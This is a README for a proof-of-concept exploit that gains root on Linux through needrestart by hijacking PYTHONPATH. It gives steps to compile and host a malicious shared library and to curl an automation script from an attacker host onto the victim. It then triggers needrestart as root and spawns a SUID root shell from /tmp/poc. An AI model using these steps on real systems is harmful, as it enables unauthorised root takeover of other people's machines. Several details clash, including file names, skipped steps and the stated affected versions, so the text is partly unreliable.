# CVE-2024-4890: needrestart Sudo Privilege Escalation PoC

[![CVE-2024-4890](https://img.shields.io/badge/CVE-2024--4890-red)](https://nvd.nist.gov/vuln/detail/CVE-2024-4890)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)

## Disclaimer
**For lab-only use in controlled environments. Do not exploit on production systems without explicit authorization. This PoC is for educational purposes only. The author is not responsible for any misuse or unauthorized access.**

## Overview
CVE-2024-4890 is a critical vulnerability in `needrestart` (versions >= 3.8) that enables arbitrary code execution with elevated privileges. The issue stems from insecure handling of environment variables and configuration files during process scanning.

Specifically, when run with `sudo`, `needrestart` inspects running Python processes, including their `PYTHONPATH` environment variable. An attacker can hijack this by setting a custom `PYTHONPATH` pointing to a controlled directory (e.g., `/tmp/attacker`). Inside this directory, a malicious module (`__init__.so`) is placed in a fake `importlib` structure. When `needrestart` attempts to import it as root (to check libraries), the payload executes, granting root access.

This PoC demonstrates the exploit via a bait Python process, a malicious shared library (compiled from C), and an automation script.

## Prerequisites
- **Target**: Linux system with `needrestart` >= 3.8 and `sudo` access to it.
- **Tools**: `gcc` (for compilation), `curl`, `python3`.

## Files Structure
Place these in `/tmp/attacker` on the **target machine**.

- `e.py`: Bait Python script (runs in loop, waits for payload success).
- `runner.sh`: Automation script to set up and trigger the bait.

## Exploit Steps
1. **Attacker Machine**: Compile `lib.c` to `__init__.so` and host it:
   
`gcc -shared -fPIC -o init.so lib.c`

`python3 -m http.server 8000`

**Target Machine** (Victim):
- Create `/tmp/attacker` directory.
- Copy the `main.py`
- Download and make `runner.sh` executable:
```bash
curl http://<ATTACKER_IP>:<PORT>/runner.sh -o /tmp/attacker/runner.sh
chmod +x /tmp/attacker/runner.sh
```
Run the setup in one terminal:
`cd /tmp/attacker && ./runner.sh`

This creates the malicious module, bait script, and starts the hijacked Python process.

3. **Trigger the Scan** (in a new SSH session):
`sudo /usr/sbin/needrestart`

`needrestart` detects the bait process, reads `PYTHONPATH`, and imports the malicious `__init__.so` as root—executing the payload.

4. **Harvest Access** (back in the `runner.sh` terminal):
- The script detects `/tmp/poc` (SUID root shell created by payload) and spawns a root shell:
`sudo /tmp/poc -p`
Clean up: `rm -rf /tmp/attacker /tmp/poc` (and remove sudoers entry if added).

**Success Indicator**: `whoami` shows `root` or `id` shows `uid=0(root)`.

